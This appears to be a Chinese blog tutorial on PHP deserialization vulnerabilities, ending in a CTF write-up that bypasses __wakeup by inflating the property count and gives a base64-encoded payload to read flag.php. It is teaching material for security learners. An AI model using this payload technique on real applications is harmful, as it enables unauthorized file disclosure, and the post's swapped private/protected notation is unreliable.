反序列化漏洞(PHP)


                                         介绍序列化和反序列化

序列化和反序列化:大型网站中类创建的对象多的时候会占用大量空间,序列化就是将这些对象转换为字符串来保存,当用到的时候再转换为对象,由字符串重新转换为对象的时候用到的就是反序列化。

例:

<?php

<?phpclass A{public $a=1;}

$a = new A();

$se_a = serialize($a);

echo $se_a;

?>

输出结果:

O:1:"A":1:{s:1:"a";i:1;}

格式说明:O:“类的名字的字节数“:“类的名字“:“对象中几个参数“:{“第一个参数名字的类型“:“第一个参数名字所占字节数”:“第一个参数名字”;“第二个参数名字的类型“:“第二个参数名字所占字节数”:“第二个参数名字”;········;“第n个参数名字的类型“:“第n个参数名字所占字节数”:“第n个参数名字”;}

以下以类的名字为“A”,参数名字为a举例子:

若参数类型为public,则参数名字的类型用字母 “s”表示,整体表示为:(s:1:"a";);

若参数类型为private,则参数名字的类型用字母“s”表示,整体表示为:(s:4:"\0*\0a";);

若参数类型为protected,则参数名字的类型用字母“S”表示,整体表示为:(S:2:"\0Aa\0";),参数前面加类的名字。(\0是表示0的ASCII码)

常见的表示类型的字符:

O:类

a:数组(array)

b:boolean

i:整型

s:字符串

N:NULL

d:double,浮点型


                            挖掘反序列化漏洞需要注意的常用魔法函数

反序列化漏洞也被成为对象注入。

__construct():当一个对象创建时被调用。

__destruct():当一个对象销毁时或者php代码执行完毕时被调用。

__toString():当一个对象被当作一个字符串使用

__sleep():在对象在被序列化之前运行

__wakeup():将在序列化之后立即被调用

__weakup()函数绕过方法:

用上面的例子,正常输出O:1:"A":1:{s:1:"a";i:1;},这里变量数量只有一个,若改成变量数量为两个则可以绕过__weakup函数。

O:1:"A":2:{s:1:"a";i:1;}

原因是php底层代码bug:简单来说,如果对象属性检查异常,那么Purrase_nested_data()将会返回0,且不调用WAKEUP()方法,但是在这之前对象和它的属性已经被创建,紧接着对象将被破坏,从而执行DESTRUCT()函数,于是导致了漏洞。


                                                    实战一道CTF题


<?php

class SoFun{   

    protected $file='index.php'; 

    function __destruct(){   //定义析构函数,当创建的对象被销毁时自动执行

      if(!empty($this->file)) { 

       if(strchr($this-> file,"\\")===false &&  strchr($this->file, '/')===false)  

          show_source(dirname (__FILE__).'/'.$this ->file);

       else      die('Wrong filename.');

      }}  

    function __wakeup(){ $this-> file='index.php'; }

    public function __toString(){return '' ;}}     

    if (!isset($_GET['file'])){ show_source('index.php'); }

    else{

       $file=base64_decode( $_GET['file']);

       echo unserialize($file ); }

?>   #<!--key in flag.php-->

这题最后输出答案的语句应该是析构函数里的这句:show_source(dirname (__FILE__).'/'.$this ->file);

可是代码最后执行反序列化的时候执行了__weakup()函数,所以就执行了__weakup()函数中的this->file='index',代码执行结束的时候,析构函数中show_source(dirname (__FILE__).'/'.$this ->file);就输出的为index..php的代码了。所以用绕过__weakup()函数的方法来不让this->file这个变量变成index.php。

1、代码审计

审计代码,可以发现要得到KEY,思路如下:

1、源码最后提示,KEY在flag.php里面;

2、注意到__destruct魔术方法中,有这么一段代码,将file文件内容显示出来

show_source(dirname(FILE).’/‘.$this->file),这个是解题关键;

3、若POST“file”参数为序列化对象,且将file设为flag.php;那么可以通过unserialize反序列化,进而调用__destruct魔术方法来显示flag.php源码(要注意的是file参数内容需要经过base64编码);

4、上面的分析是多么美好,但从代码分析可以知道,还有__wakeup这个拦路虎,通过unserialize反序列化之后,也会调用__wakeup方法,它会把file设为index.php;

5、总结下来就是,想办法把file设为flag.php,调用__destruct方法,且绕过__wakeup。

2、PHP反序列化对象注入漏洞

上网查资料,发现原来这个CTF题目是根据PHP反序列化对象注入漏洞改编的。

简单来说,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行举个栗子,比如有个Student类,里面有个参数为name。

实际情况:O:7:”Student”:1:{S:4:”name”;s:8:”zhangsan”;}

Payload:O:7:”Student”:2:{S:4:”name”;s:8:”zhangsan”;}Payload对象属性个数为2,而实际属性个数为1,那么就会掉入漏洞,从而跳过wakeup()方法。

3、CTF Payload

明确了这些之后,就可以构造出Payload了,需反序列化的对象为:

O:5:”SoFun”:2:{S:7:”\00*\00file”;s:8:”flag.php”;}   

O:5:”SoFun” 指的是 类:5个字符:SoFun

:2:  指的是 有两个对象

S:7:”\00*\00file”   指的是有个属性,有7个字符,名为\00*\00file

s:8:”flag.php”   指的是属性值,有8个字符,值为flag.php   

值得注意的是,file是protected属性,因此需要用\00*\00来表示,\00代表ascii为0的值。另外,还需要经过Base64编码,结果为:

Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ==


参考链接:https://www.freebuf.com/news/172507.html

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,014评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,796评论 3 386
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,484评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,830评论 1 285
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,946评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,114评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,182评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,927评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,369评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,678评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,832评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,533评论 4 335
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,166评论 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,885评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,128评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,659评论 2 362
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,738评论 2 351

推荐阅读更多精彩内容

  • php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险。为了理解这个漏洞,请读者具备基...
    BerL1n阅读 3,563评论 0 2
  • 2018/3/16 17:34:51 WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获...
    Sec小玖阅读 22,381评论 1 11
  • 浪客北纬:专注安慰,陪伴和成长 ...
    浪客北纬阅读 226评论 0 0
  • A供应商将物资发货通知告知采购部 B采购部接收通知并及时告知仓储部 C仓储部收到供应商发来的货要及时上报报检给质检...
    无谓石阅读 595评论 0 0
  • 今天科室请了一个全国一流医院的治疗师过来给我们讲课。 56岁的人,听口音是北京当地人,很接地气的感觉。没有一点压力...
    开心的灵通阅读 399评论 0 0